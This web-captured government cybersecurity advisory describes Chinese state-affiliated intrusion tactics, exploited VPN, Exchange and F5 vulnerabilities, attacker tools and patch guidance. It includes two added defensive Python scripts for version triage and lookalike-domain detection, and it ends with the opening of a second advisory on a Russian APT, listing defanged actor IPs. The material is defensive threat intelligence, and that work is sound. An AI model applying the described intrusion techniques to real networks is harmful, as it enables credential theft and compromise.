Department of Justice indictment, MSS-affiliated actors have targeted various industries across the United States and other countries\u2014including high-tech manufacturing; medical device, civil, and industrial engineering; business, educational, and gaming software; solar energy; pharmaceuticals; and defense\u2014in a campaign that lasted over ten years.[[1](<https://www.justice.gov/opa/pr/two-chinese-hackers-working-ministry-state-security-charged-global-computer-intrusion>)] These hackers acted for both their own personal gain and the benefit of the Chinese MSS.[[2](<https://www.justice.gov/opa/pr/two-chinese-hackers-working-ministry-state-security-charged-global-computer-intrusion>)]\n\nAccording to the indictment,\n\n_To conceal the theft of information from victim networks and otherwise evade detection, the defendants typically packaged victim data in encrypted Roshal Archive Compressed files (RAR files), changed RAR file and victim documents\u2019 names and extensions (e.g., from \u201c.rar\u201d to \u201c.jpg\u201d) and system timestamps, and concealed programs and documents at innocuous-seeming locations on victim networks and in victim networks\u2019 \u201crecycle bins.\u201d The defendants frequently returned to re-victimize companies, government entities, and organizations from which they had previously stolen data, in some cases years after the initial successful data theft. In several instances, however, the defendants were unsuccessful in this regard, due to the efforts of the FBI and network defenders._\n\nThe continued use of open-source tools by Chinese MSS-affiliated cyber threat actors highlights that adversaries can use relatively low-complexity capabilities to identify and exploit target networks. In most cases, cyber operations are successful because misconfigurations and immature patch management programs allow actors to plan and execute attacks using existing vulnerabilities and known exploits. 
Widespread implementation of robust configuration and patch management programs would greatly increase network security. It would also reduce the speed and frequency of opportunistic attacks by forcing threat actors to dedicate time and funding to research unknown vulnerabilities and develop custom exploitation tools.

### MITRE PRE-ATT&CK® Framework for Analysis

In the last 12 months, CISA analysts have routinely observed Chinese MSS-affiliated actors using the following PRE-ATT&CK® Framework TTPs.

#### Target Selection and Technical Information Gathering

_Target Selection_ [[TA0014](<https://attack.mitre.org/versions/v7/tactics/TA0014/>)] is a critical part of cyber operations. While cyber threat actors’ motivations and intents are often unknown, they often make their selections based on the target network’s security posture. Threat actors can use information sources such as Shodan, the Common Vulnerabilities and Exposure (CVE) database, and the National Vulnerabilities Database (NVD).[[3](<https://www.shodan.io/>)][[4](<https://cve.mitre.org/>)][[5](<https://nvd.nist.gov/>)]

 * Shodan is an internet search engine that can be used to identify vulnerable devices connected to the internet. Shodan queries can also be customized to discover specific vulnerabilities on devices, which enables sophisticated cyber threat actors to use relatively unsophisticated techniques to execute opportunistic attacks on susceptible targets.
 * The CVE database and the NVD contain detailed information about vulnerabilities in applications, appliances, and operating systems that can be exploited by cyber threat actors if they remain unpatched. These sources also provide risk assessments if any of the recorded vulnerabilities are successfully exploited.

These information sources have legitimate uses for network defense.
CISA analysts are able to identify Federal Government systems that may be susceptible to exploitation attempts by using Shodan, the CVE database, and the NVD to enrich NCPS information. Unlike threat actors, CISA takes the necessary actions to notify network owners of their exposure in order to prevent an impending intrusion or quickly identify intrusions as they occur.

While using these data sources, CISA analysts have observed a correlation between the public release of a vulnerability and targeted scanning of systems identified as being vulnerable. This correlation suggests that cyber threat actors also rely on Shodan, the CVE database, the NVD, and other open-source information to identify targets of opportunity and plan cyber operations. Together, these data sources provide users with the understanding of a specific vulnerability, as well as a list of systems that may be vulnerable to attempted exploits. These information sources therefore contain invaluable information that can lead cyber threat actors to implement highly effective attacks.

CISA has observed Chinese MSS-affiliated actors using the techniques in table 1 to gather technical information to enable cyber operations against Federal Government networks (_Technical Information Gathering_ [[TA0015](<https://attack.mitre.org/versions/v7/tactics/TA0015/>)]).

_Table 1: Technical information gathering techniques observed by CISA_

| MITRE ID | Name | Observation |
|---|---|---|
| [T1245](<https://attack.mitre.org/versions/v7/techniques/T1245/>) | Determine Approach/Attack Vector | The threat actors narrowed the attack vectors to relatively recent vulnerability disclosures with open-source exploits. |
| [T1247](<https://attack.mitre.org/versions/v7/techniques/T1247/>) | Acquire Open Source Intelligence (OSINT) Data Sets and Information | CISA observed activity from network proxy service Internet Protocol (IP) addresses to three Federal Government webpages. This activity appeared to enable information gathering activities. |
| [T1254](<https://attack.mitre.org/versions/v7/techniques/T1254/>) | Conduct Active Scanning | CISA analysts reviewed the network activity of known threat actor IP addresses and found evidence of reconnaissance activity involving virtual security devices. |

#### Technical Weakness Identification

CISA analysts consistently observe targeting, scanning, and probing of significant vulnerabilities within days of their emergence and disclosure. This targeting, scanning, and probing frequently leads to compromises at the hands of sophisticated cyber threat actors. In some cases, cyber threat actors have used the same vulnerabilities to compromise multiple organizations across many sectors. Organizations do not appear to be mitigating known vulnerabilities as quickly as cyber threat actors are exploiting them. CISA recently released an alert that highlighted the top 10 vulnerabilities routinely exploited by sophisticated foreign cyber threat actors from 2016 to 2019.[[6](<https://us-cert.cisa.gov/ncas/alerts/aa20-133a>)]

Additionally, table 2 provides a list of notable compromises by Chinese MSS-affiliated actors within the past 12 months.

_Table 2: Significant CVEs targeted by Chinese MSS-affiliated actors in the last 12 months_

| Vulnerability | Observations |
|---|---|
| CVE-2020-5902: F5 Big-IP Vulnerability | CISA has conducted incident response engagements at Federal Government and commercial entities where the threat actors exploited CVE-2020-5902. This is a vulnerability in F5’s Big-IP Traffic Management User Interface that allows cyber threat actors to execute arbitrary system commands, create or delete files, disable services, and/or execute Java code.[[7](<https://us-cert.cisa.gov/ncas/alerts/aa20-206a>)] |
| CVE-2019-19781: Citrix Virtual Private Network (VPN) Appliances | CISA has observed the threat actors attempting to discover vulnerable Citrix VPN Appliances. CVE-2019-19781 enabled the actors to execute directory traversal attacks.[[8](<https://us-cert.cisa.gov/ncas/alerts/aa20-031a>)] |
| CVE-2019-11510: Pulse Secure VPN Servers | CISA has conducted multiple incident response engagements at Federal Government and commercial entities where the threat actors exploited CVE-2019-11510—an arbitrary file reading vulnerability affecting Pulse Secure VPN appliances—to gain access to victim networks. Although Pulse Secure released patches for CVE-2019-11510 in April 2019, CISA observed incidents where compromised Active Directory credentials were used months after the victim organization patched their VPN appliance.[[9](<https://us-cert.cisa.gov/ncas/alerts/aa20-107a>)] |
| CVE-2020-0688: Microsoft Exchange Server | CISA has observed the actors exploiting CVE-2020-0688 for remote code execution to enable email collection of targeted networks. |

Additionally, CISA has observed Chinese MSS-affiliated actors using the techniques listed in table 3 to identify technical weaknesses in Federal Government networks (_Technical Weakness Identification_ [[TA0018](<https://attack.mitre.org/versions/v7/tactics/TA0018/>)]).
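Table 2 above records that Pulse Secure shipped fixes for CVE-2019-11510 in April 2019, and Table 12 in the Mitigations section of this advisory lists the Pulse Connect Secure and Pulse Policy Secure version ranges the advisory names as vulnerable. The script below is an added example written for this page, not CISA's or Pulse Secure's code: it parses the vendor's `major.minorRrelease[.maintenance]` version strings, compares them as integer tuples, and reports whether each appliance in an inventory falls inside one of the Table 12 ranges. The ranges are assumed to be inclusive at both ends, and the hostnames and versions in the sample inventory are constructed for the example.

```python
import re
from typing import Dict, List, Tuple

# Affected version ranges exactly as listed in Table 12 of the advisory for
# CVE-2019-11510. Each range is read as inclusive at both ends (assumption).
AFFECTED_RANGES: Dict[str, List[Tuple[str, str]]] = {
    "Pulse Connect Secure": [
        ("9.0R1", "9.0R3.3"),
        ("8.3R1", "8.3R7"),
        ("8.2R1", "8.2R12"),
        ("8.1R1", "8.1R15"),
    ],
    "Pulse Policy Secure": [
        ("9.0R1", "9.0R3.1"),
        ("5.4R1", "5.4R7"),
        ("5.3R1", "5.3R12"),
        ("5.2R1", "5.2R12"),
        ("5.1R1", "5.1R15"),
    ],
}

# Pulse versions look like 9.0R3.3: major.minor, an "R" release number,
# and an optional maintenance number after a second dot.
VERSION_RE = re.compile(r"^(\d+)\.(\d+)R(\d+)(?:\.(\d+))?$")


def parse_version(version: str) -> Tuple[int, int, int, int]:
    """Turn '9.0R3.3' into (9, 0, 3, 3); a missing maintenance number counts as 0."""
    m = VERSION_RE.match(version.strip())
    if not m:
        raise ValueError(f"unrecognised Pulse version string: {version!r}")
    major, minor, release, maint = m.groups()
    return (int(major), int(minor), int(release), int(maint or 0))


def is_affected(product: str, version: str) -> bool:
    """True if the version lies inside any Table 12 range for the product."""
    v = parse_version(version)
    ranges = AFFECTED_RANGES.get(product)
    if ranges is None:
        raise KeyError(f"no range data for product {product!r}")
    return any(parse_version(lo) <= v <= parse_version(hi) for lo, hi in ranges)


def triage(inventory: List[Tuple[str, str, str]]) -> List[Tuple[str, str, str, bool]]:
    """Annotate an (hostname, product, version) inventory with the affected flag."""
    return [(host, product, version, is_affected(product, version))
            for host, product, version in inventory]


if __name__ == "__main__":
    # Constructed sample inventory; hostnames and versions are illustrative only.
    sample = [
        ("vpn-1.example.test", "Pulse Connect Secure", "9.0R3.3"),
        ("vpn-2.example.test", "Pulse Connect Secure", "9.0R3.4"),
        ("nac-1.example.test", "Pulse Policy Secure", "9.0R3.2"),
        ("vpn-3.example.test", "Pulse Connect Secure", "8.2R5"),
    ]
    for host, product, version, affected in triage(sample):
        print(f"{host:22} {product:22} {version:8} {'AFFECTED' if affected else 'not listed'}")
```

A version such as `8.3R7.1` sorts above the listed `8.3R7` endpoint and is therefore reported as not listed; treat that as "outside the table", not "safe", and confirm against the vendor advisory linked in Table 12. Table 2 also makes the point that patch state alone is not enough for this CVE: credentials taken before the fix were reused months later, so appliances that ever ran an affected version warrant a credential reset as well as the upgrade.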
_Table 3: Technical weakness identification techniques observed by CISA_

| MITRE ID | Name | Observation |
|---|---|---|
| [T1288](<https://attack.mitre.org/versions/v7/techniques/T1288/>) | Analyze Architecture and Configuration Posture | CISA observed the cyber actors scanning a Federal Government agency for vulnerable web servers. CISA also observed the threat actors scanning for network appliances vulnerable to CVE-2019-11510. |
| [T1291](<https://attack.mitre.org/versions/v7/techniques/T1291/>) | Research Relevant Vulnerabilities | CISA has observed the threat actors’ scanning and reconnaissance of Federal Government internet-facing systems shortly after the disclosure of significant CVEs. |

#### Build Capabilities

CISA analysts have observed cyber threat actors using command and control (C2) infrastructure as part of their cyber operations. These observations also provide evidence that threat actors can build and maintain relatively low-complexity capabilities, such as C2, to enable cyber operations against Federal Government networks (_Build Capabilities_ [[TA0024](<https://attack.mitre.org/versions/v7/tactics/TA0024/>)]). CISA has observed Chinese MSS-affiliated actors using the build capabilities summarized in table 4.

_Table 4: Build capabilities observed by CISA_

| MITRE ID | Name | Observation |
|---|---|---|
| [T1352](<https://attack.mitre.org/versions/v7/techniques/T1352/>) | C2 Protocol Development | CISA observed beaconing from a Federal Government entity to the threat actors’ C2 server. |
| [T1328](<https://attack.mitre.org/versions/v7/techniques/T1328/>) | Buy Domain Name | CISA has observed the use of domains purchased by the threat actors. |
| [T1329](<https://attack.mitre.org/versions/v7/techniques/T1329/>) | Acquire and / or use of 3rd Party Infrastructure | CISA has observed the threat actors using virtual private servers to conduct cyber operations. |
| [T1346](<https://attack.mitre.org/versions/v7/techniques/T1346>) | Obtain/Re-use Payloads | CISA has observed the threat actors use and reuse existing capabilities. |
| [T1349](<https://attack.mitre.org/versions/v7/techniques/T1349>) | Build or Acquire Exploit | CISA has observed the threat actors using a variety of open-source and publicly available exploits and exploit code to compromise Federal Government networks. |

### MITRE ATT&CK Framework for Analysis

CISA has observed sophisticated cyber threat actors, including Chinese MSS-affiliated actors, using commercial and open-source tools to conduct their operations. For example, threat actors often leverage internet software repositories such as GitHub and Exploit-DB.[[10](<https://www.GitHub.com>)][[11](<https://exploit-db.com>)] Both repositories are commonly used for legitimate development, penetration testing, and developing open-source code, but cyber threat actors can also use them to find code to enable nefarious actions.

During incident response activities, CISA frequently observed Chinese government-affiliated actors using the open-source tools outlined in table 5.

_Table 5: Common exploit tools CISA observed used by Chinese MSS-affiliated actors_

| Tool | Observations |
|---|---|
| [Cobalt Strike](<https://attack.mitre.org/versions/v7/software/S0154/>) | CISA has observed the threat actors using Cobalt Strike to target commercial and Federal Government networks. Cobalt Strike is a commercial penetration testing tool used to conduct red team operations. It contains a number of tools that complement the cyber threat actor’s exploitation efforts, such as a keystroke logger, file injection capability, and network services scanners. CISA observed connections from a Federal Government agency to multiple IP addresses possibly hosting Cobalt Strike team servers. |
| [China Chopper Web Shell](<https://attack.mitre.org/versions/v7/software/S0020/>) | CISA has observed the actors successfully deploying China Chopper against organizations’ networks. This open-source tool can be downloaded from internet software repositories such as GitHub and Exploit-DB. China Chopper is a web shell hosted on a web server. It is mainly used for web application attacks, and it is configured in a client/server relationship. China Chopper contains security scanners and can be used to upload files and brute-force passwords. |
| [Mimikatz](<https://attack.mitre.org/versions/v7/software/S0002/>) | CISA has observed the actors using Mimikatz during their operations. This open-source tool is used to capture account credentials and perform privilege escalation with pass-the-hash attacks that allow an attacker to pass captured password hashes and authenticate to network devices.[[12](<https://www.varonis.com/blog/what-is-mimikatz/>)] |

The following sections list the ATT&CK Framework TTPs routinely employed by Chinese government-affiliated actors to conduct cyber operations as observed by CISA analysts.

#### Initial Access

In the last 12 months, CISA has observed Chinese MSS-affiliated actors use spearphishing emails with embedded links to actor-owned infrastructure and, in some cases, compromise or poison legitimate sites to enable cyber operations.

CISA has observed the threat actors using the _Initial Access_ [[TA0001](<https://attack.mitre.org/versions/v7/tactics/TA0001/>)] techniques identified in table 6.

_Table 6: Initial access techniques observed by CISA_

| MITRE ID | Name | Observation |
|---|---|---|
| [T1204.001](<https://attack.mitre.org/versions/v7/techniques/T1204/001/>) | User Execution: Malicious Link | CISA has observed indications that users have clicked malicious links embedded in spearphishing emails that the threat actors sent. |
| [T1566.002](<https://attack.mitre.org/versions/v7/techniques/T1566/002>) | Phishing: Spearphishing Link | CISA analyzed network activity of a Federal Government entity and concluded that the threat actors sent a malicious email weaponized with links. |
| [T1190](<https://attack.mitre.org/versions/v7/techniques/T1190>) | Exploit Public-Facing Application | CISA has observed the actors leveraging CVE-2019-19781 to compromise Citrix Application Delivery Controllers. |
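Table 6 records users clicking links in spearphishing emails that led to actor-owned infrastructure, and the second advisory further down this page lists lookalike hosts such as `columbusairports.microsoftonline[.]host` and `email.microsoftonline[.]services` that borrow a Microsoft brand label on a foreign domain. The snippet below is an added example written for this page (not CISA's code and not from either advisory): it pulls URLs out of a message body, re-fangs the `hxxp` / `[.]` notation used in threat reports so the IoCs can be fed in as-is, and flags any host that contains a protected brand label while its registrable domain is not on an allowlist. The brand allowlist and the sample message are constructed for the example, and the two-label registrable-domain heuristic is a simplification that does not understand multi-label public suffixes such as `co.uk`.

```python
import re
from typing import Dict, List, Set, Tuple
from urllib.parse import urlparse

# Constructed allowlist: a brand label that may legitimately appear in a
# hostname, mapped to the registrable domains where it belongs. Extend per site.
PROTECTED_BRANDS: Dict[str, Set[str]] = {
    "microsoftonline": {"microsoftonline.com"},
    "microsoft": {"microsoft.com", "microsoftonline.com"},
}

URL_RE = re.compile(r"""https?://[^\s<>"'()]+""", re.IGNORECASE)


def refang(text: str) -> str:
    """Undo report-style defanging ('hxxp', '[.]') so URLs parse normally."""
    return re.sub(r"hxxp", "http", text, flags=re.IGNORECASE).replace("[.]", ".")


def registrable_domain(host: str) -> str:
    """Last two labels of the host. Heuristic: ignores suffixes like co.uk."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else host.lower()


def classify_host(host: str) -> Tuple[str, str]:
    """('lookalike', brand) if the host reuses a brand label on a registrable
    domain that is not allowlisted for that brand; otherwise ('ok', '')."""
    host = host.lower()
    rd = registrable_domain(host)
    for brand, legit_domains in PROTECTED_BRANDS.items():
        if brand in host and rd not in legit_domains:
            return ("lookalike", brand)
    return ("ok", "")


def flag_links(message: str) -> List[Tuple[str, str]]:
    """Extract every URL in the message; return (host, brand) for each lookalike."""
    findings: List[Tuple[str, str]] = []
    for url in URL_RE.findall(refang(message)):
        host = urlparse(url).hostname or ""
        verdict, brand = classify_host(host)
        if verdict == "lookalike":
            findings.append((host, brand))
    return findings


# Constructed sample message. The two lookalike hosts are the defanged IoCs
# listed in the second advisory on this page; refang() restores them.
SAMPLE_MESSAGE = """Subject: Updated MFA enrollment procedure

Sign in here to confirm your enrollment:
https://login.microsoftonline.com/common/oauth2/authorize

Alternate portal if the link above fails:
http://email.microsoftonline[.]services/login

Airport operations bulletin: hxxp://columbusairports.microsoftonline[.]host/docs/notice.pdf
"""

if __name__ == "__main__":
    for host, brand in flag_links(SAMPLE_MESSAGE):
        print(f"LOOKALIKE host={host} brand={brand}")
```

The legitimate `login.microsoftonline.com` link passes because its registrable domain is allowlisted for the `microsoftonline` label; the other two are reported. The same classifier can be run over proxy or DNS logs instead of mail bodies, which is where the second advisory's IoC list would normally be matched.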
Cyber threat actors can continue to successfully launch these types of low-complexity attacks—as long as misconfigurations in operational environments and immature patch management programs remain in place—by taking advantage of common vulnerabilities and using readily available exploits and information.

#### Execution

CISA analysts continue to observe beaconing activity indicative of compromise or ongoing access to Federal Government networks. This beaconing is a result of cyber threat actors successfully completing cyber operations that are often designed around emergent vulnerabilities and reliant on existing exploitation tools, as mentioned in this document.

CISA has observed Chinese MSS-affiliated actors using the _Execution_ [[TA0002](<https://attack.mitre.org/versions/v7/tactics/TA0002/>)] technique identified in table 7.

_Table 7: Execution technique observed by CISA_

| MITRE ID | Name | Observation |
|---|---|---|
| [T1072](<https://attack.mitre.org/versions/v7/techniques/T1072>) | Software Deployment Tools | CISA observed activity from a Federal Government IP address beaconing out to the threat actors’ C2 server, which is usually an indication of compromise. |

#### Credential Access

Cyber threat actors also continue to identify large repositories of credentials that are available on the internet to enable brute-force attacks. While this sort of activity is not a direct result of the exploitation of emergent vulnerabilities, it demonstrates that cyber threat actors can effectively use available open-source information to accomplish their goals. Further, a threat actor does not require a high degree of competence or sophistication to successfully carry out this kind of opportunistic attack.

CISA has observed Chinese MSS-affiliated actors using the _Credential Access_ [[TA0006](<https://attack.mitre.org/versions/v7/tactics/TA0006/>)] techniques highlighted in table 8.

_Table 8: Credential access techniques observed by CISA_

| MITRE ID | Name | Observation |
|---|---|---|
| [T1003.001](<https://attack.mitre.org/versions/v7/techniques/T1003/001/>) | Operating System (OS) Credential Dumping: Local Security Authority Subsystem Service (LSASS) Memory | CISA observed the threat actors using Mimikatz in conjunction with coin miner protocols and software. The actors used Mimikatz to dump credentials from the OS using a variety of capabilities resident within the tool. |
| [T1110.004](<https://attack.mitre.org/versions/v7/techniques/T1110/004>) | Brute Force: Credential Stuffing | CISA observed what was likely a brute-force attack against Remote Desktop Protocol on a public-facing server. |

#### Discovery

As with any cyber operation, cyber threat actors must be able to confirm that their target is online and vulnerable—there are a multitude of open-source scanning and reconnaissance tools available to them to use for this purpose. CISA consistently observes scanning activity across federal agencies that is indicative of discovery techniques.
CISA has observed Chinese MSS-affiliated actors scanning Federal Government traffic using the discovery technique highlighted in table 9 (_Discovery_ [[TA0007](<https://attack.mitre.org/versions/v7/tactics/TA0007/>)]).

_Table 9: Discovery technique observed by CISA_

| MITRE ID | Name | Observation |
|---|---|---|
| [T1046](<https://attack.mitre.org/versions/v7/techniques/T1046/>) | Network Service Scanning | CISA has observed suspicious network scanning activity for various ports at Federal Government entities. |

#### Collection

Within weeks of public disclosure of CVE-2020-0688, CISA analysts identified traffic that was indicative of Chinese MSS-affiliated threat actors attempting to exploit this vulnerability using the _Collection_ [[TA0009](<https://attack.mitre.org/versions/v7/tactics/TA0009/>)] technique listed in table 10.

_Table 10: Collection technique observed by CISA_

| MITRE ID | Name | Observation |
|---|---|---|
| [T1114](<https://attack.mitre.org/versions/v7/techniques/T1114>) | Email Collection | CISA observed the actors targeting CVE-2020-0688 to collect emails from the Exchange servers found in Federal Government environments. |

#### Command and Control

CISA analysts often observe cyber threat actors using external proxy tools or hop points to enable their cyber operations while remaining anonymous. These proxy tools may be commercially available infrastructure as a service (IaaS) or software as a service (SaaS) in the form of a web browser promising anonymity on the internet. For example, “The Onion Router” (Tor) is often used by cyber threat actors for anonymity and C2. Actors carefully choose proxy tools depending on their intended use. These techniques are relatively low in complexity and enabled by commercially available tools, yet they are highly effective and often reliant upon existing vulnerabilities and readily available exploits.

CISA has observed Chinese MSS-affiliated actors using the _Command and Control_ [[TA0011](<https://attack.mitre.org/versions/v7/tactics/TA0011/>)] techniques listed in table 11.

_Table 11: Command and control techniques observed by CISA_

| MITRE ID | Name | Observation |
|---|---|---|
| [T1090.002](<https://attack.mitre.org/versions/v7/techniques/T1090/002>) | Proxy: External Proxy | CISA observed activity from a network proxy tool to 221 unique Federal Government agency IP addresses. |
| [T1090.003](<https://attack.mitre.org/versions/v7/techniques/T1090/003>) | Proxy: Multi-hop Proxy | CISA observed activity from Tor that has resulted in confirmed compromises of internet-facing Federal Government agency systems. |
| [T1573.002](<https://attack.mitre.org/versions/v7/techniques/T1573/002>) | Encrypted Channel: Asymmetric Cryptography | CISA observed activity from Tor that has resulted in confirmed compromises of internet-facing Federal Government agency systems. |

### Mitigations

CISA asserts with high confidence that sophisticated cyber threat actors will continue to use open-source resources and tools to target networks with a low security posture. When sophisticated cyber threat actors conduct operations against soft targets, it can negatively impact critical infrastructure and federal, state, local, tribal, and territorial government networks, possibly resulting in loss of critical data or personally identifiable information.

CISA and the FBI recommend that organizations place an increased priority on patching the vulnerabilities routinely exploited by MSS-affiliated cyber actors. See table 12 for patch information on the CVEs mentioned in this report.
For more information on vulnerabilities routinely exploited by sophisticated cyber actors, see [CISA Alert: Top 10 Routinely Exploited Vulnerabilities](<https://us-cert.cisa.gov/ncas/alerts/aa20-133a>).

_Table 12: Patch Information for Vulnerabilities Routinely Exploited by MSS-affiliated Cyber Actors_

| Vulnerability | Vulnerable Products | Patch Information |
|---|---|---|
| [CVE-2020-5902](<https://nvd.nist.gov/vuln/detail/CVE-2020-5902>) | Big-IP devices (LTM, AAM, Advanced WAF, AFM, Analytics, APM, ASM, DDHD, DNS, FPS, GTM, Link Controller, PEM, SSLO, CGNAT) | [F5 Security Advisory: K52145254: TMUI RCE vulnerability CVE-2020-5902](<https://support.f5.com/csp/article/K52145254>) |
| [CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>) | Citrix Application Delivery Controller; Citrix Gateway; Citrix SDWAN WANOP | [Citrix blog post: firmware updates for Citrix ADC and Citrix Gateway versions 11.1 and 12.0](<https://www.citrix.com/blogs/2020/01/19/vulnerability-update-first-permanent-fixes-available-timeline-accelerated/>); [Citrix blog post: security updates for Citrix SD-WAN WANOP release 10.2.6 and 11.0.3](<https://www.citrix.com/blogs/2020/01/22/update-on-cve-2019-19781-fixes-now-available-for-citrix-sd-wan-wanop/>); [Citrix blog post: firmware updates for Citrix ADC and Citrix Gateway versions 12.1 and 13.0](<https://www.citrix.com/blogs/2020/01/23/fixes-now-available-for-citrix-adc-citrix-gateway-versions-12-1-and-13-0/>); [Citrix blog post: firmware updates for Citrix ADC and Citrix Gateway version 10.5](<https://www.citrix.com/blogs/2020/01/24/citrix-releases-final-fixes-for-cve-2019-19781/>) |
| [CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>) | Pulse Connect Secure 9.0R1 - 9.0R3.3, 8.3R1 - 8.3R7, 8.2R1 - 8.2R12, 8.1R1 - 8.1R15; Pulse Policy Secure 9.0R1 - 9.0R3.1, 5.4R1 - 5.4R7, 5.3R1 - 5.3R12, 5.2R1 - 5.2R12, 5.1R1 - 5.1R15 | [Pulse Secure Out-of-Cycle Advisory: Multiple vulnerabilities resolved in Pulse Connect Secure / Pulse Policy Secure 9.0RX](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101>) |
| [CVE-2020-0688](<https://nvd.nist.gov/vuln/detail/CVE-2020-0688>) | Microsoft Exchange Servers | [Microsoft Security Advisory: CVE-2020-0688: Microsoft Exchange Validation Key Remote Code Execution Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0688>) |

CISA and the FBI also recommend that organizations routinely audit their configuration and patch management programs to ensure they can track and mitigate emerging threats. Implementing a rigorous configuration and patch management program will hamper sophisticated cyber threat actors’ operations and protect organizations’ resources and information systems.

### Contact Information

To report suspicious or criminal activity related to information found in this Joint Cybersecurity Advisory, contact your local FBI field office at [www.fbi.gov/contact-us/field](<https://www.fbi.gov/contact-us/field-offices>), or the FBI’s 24/7 Cyber Watch (CyWatch) at (855) 292-3937 or by e-mail at [CyWatch@fbi.gov](<mailto:CyWatch@fbi.gov>). When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. To request incident response resources or technical assistance related to these threats, contact CISA at [central@cisa.dhs.gov](<mailto:Central@cisa.dhs.gov>).

### References

[[1] U.S. Department of Justice Press Release](<https://www.justice.gov/opa/pr/two-chinese-hackers-working-ministry-state-security-charged-global-computer-intrusion>)

[[2] U.S. 
Department of Justice Press Release](<https://www.justice.gov/opa/pr/two-chinese-hackers-working-ministry-state-security-charged-global-computer-intrusion>)

[[3] Shodan](<https://www.shodan.io>)

[[4] MITRE Common Vulnerabilities and Exposures List](<https://cve.mitre.org>)

[[5] National Institute of Standards and Technology National Vulnerability Database](<https://nvd.nist.gov/>)

[[6] CISA Alert AA20-133A: Top 10 Routinely Exploited Vulnerabilities](<https://us-cert.cisa.gov/ncas/alerts/aa20-133a>)

[[7] CISA Alert AA20-206A: Threat Actor Exploitation of F5 BIG-IP CVE-2020-5902](<https://us-cert.cisa.gov/ncas/alerts/aa20-206a>)

[[8] CISA Alert AA20-031A: Detecting Citrix CVE-2019-19781](<https://us-cert.cisa.gov/ncas/alerts/aa20-031a>)

[[9] CISA Alert AA20-107A: Continued Threat Actor Exploitation Post Pulse Secure VPN Patching](<https://us-cert.cisa.gov/ncas/alerts/aa20-107a>)

[[10] GitHub](<https://www.GitHub.com>)

[[11] Exploit-DB](<https://www.exploit-db.com/>)

[[12] What is Mimikatz: The Beginner's Guide (VARONIS)](<https://www.varonis.com/blog/what-is-mimikatz/>)

### Revisions

September 14, 2020: Initial Version

Record metadata for this advisory: ID AA20-258A, type ics, record published and last modified 2020-10-24; source <https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-258a>; CVEs referenced: CVE-2019-11510, CVE-2019-19781, CVE-2020-0688, CVE-2020-5902; CVSS v3.1 base score 10.0 (CRITICAL, CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H, exploitability 3.9, impact 6.0); CVSS v2 base score 10.0 (HIGH, AV:N/AC:L/Au:N/C:C/I:C/A:C, exploitability 10.0, impact 10.0).

### Summary

_This joint cybersecurity advisory uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK®) framework. See the [ATT&CK for Enterprise](<https://attack.mitre.org/versions/v7/>) framework for all referenced threat actor tactics and techniques._

This joint cybersecurity advisory—written by the Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA)—provides information on Russian state-sponsored advanced persistent threat (APT) actor activity targeting various U.S. state, local, territorial, and tribal (SLTT) government networks, as well as aviation networks. This advisory updates joint CISA-FBI cybersecurity advisory [AA20-283A: APT Actors Chaining Vulnerabilities Against SLTT, Critical Infrastructure, and Elections Organizations](<https://us-cert.cisa.gov/ncas/alerts/aa20-283a>).

Since at least September 2020, a Russian state-sponsored APT actor—known variously as Berserk Bear, Energetic Bear, TeamSpy, Dragonfly, Havex, Crouching Yeti, and Koala in open-source reporting—has conducted a campaign against a wide variety of U.S. targets.
The Russian state-sponsored APT actor has targeted dozens of SLTT government and aviation networks, attempted intrusions at several SLTT organizations, successfully compromised network infrastructure, and as of October 1, 2020, exfiltrated data from at least two victim servers.

The Russian-sponsored APT actor is obtaining user and administrator credentials to establish initial access, enable lateral movement once inside the network, and locate high value assets in order to exfiltrate data. In at least one compromise, the APT actor laterally traversed an SLTT victim network and accessed documents related to:

 * Sensitive network configurations and passwords.
 * Standard operating procedures (SOP), such as enrolling in multi-factor authentication (MFA).
 * IT instructions, such as requesting password resets.
 * Vendors and purchasing information.
 * Printing access badges.

To date, the FBI and CISA have no information to indicate this APT actor has intentionally disrupted any aviation, education, elections, or government operations. However, the actor may be seeking access to obtain future disruption options, to influence U.S. policies and actions, or to delegitimize SLTT government entities.

As this recent malicious activity has been directed at SLTT government networks, there may be some risk to elections information housed on SLTT government networks. However, the FBI and CISA have no evidence to date that integrity of elections data has been compromised. Due to the heightened awareness surrounding elections infrastructure and the targeting of SLTT government networks, the FBI and CISA will continue to monitor this activity and its proximity to elections infrastructure.

 * Click here for a PDF version of this report.
 * Click here for a STIX package of IOCs.

#### U.S. Heat Map of Activity

[Click here](<https://indd.adobe.com/view/64463245-3411-49f9-b203-1c7cb8f16769>) for an interactive heat map of this activity (current as of November 17, 2020). Hovering the cursor over the map reveals the number and type of entities the Russian APT has targeted in each region. These totals include compromises, scanning, or other reconnaissance activity executed from the Russian APT actor infrastructure.

**Note**: CISA is committed to providing access to our web pages and documents for individuals with disabilities, both members of the public and federal employees. If the format of any elements or content within this document interferes with your ability to access the information, as defined in the Rehabilitation Act, please email [info@us-cert.gov](<mailto:info@us-cert.gov>). To enable us to respond in a manner most helpful to you, please indicate the nature of your accessibility problem and the preferred format in which to receive the material.

**Note**: the heat map has interactive features that may not work in your web browser. For best use, please download and save this catalog.

### Technical Details

The FBI and CISA have observed Russian state-sponsored APT actor activity targeting U.S. SLTT government networks, as well as aviation networks. The APT actor is using Turkish IP addresses `213.74.101[.]65`, `213.74.139[.]196`, and `212.252.30[.]170` to connect to victim web servers (_Exploit Public Facing Application_ [[T1190](<https://attack.mitre.org/versions/v7/techniques/T1190/>)]).

The actor is using `213.74.101[.]65` and `213.74.139[.]196` to attempt brute force logins and, in several instances, attempted Structured Query Language (SQL) injections on victim websites (_Brute Force_ [[T1110](<https://attack.mitre.org/versions/v7/techniques/T1110>)]; _Exploit Public Facing Application_ [[T1190](<https://attack.mitre.org/versions/v7/techniques/T1190/>)]).
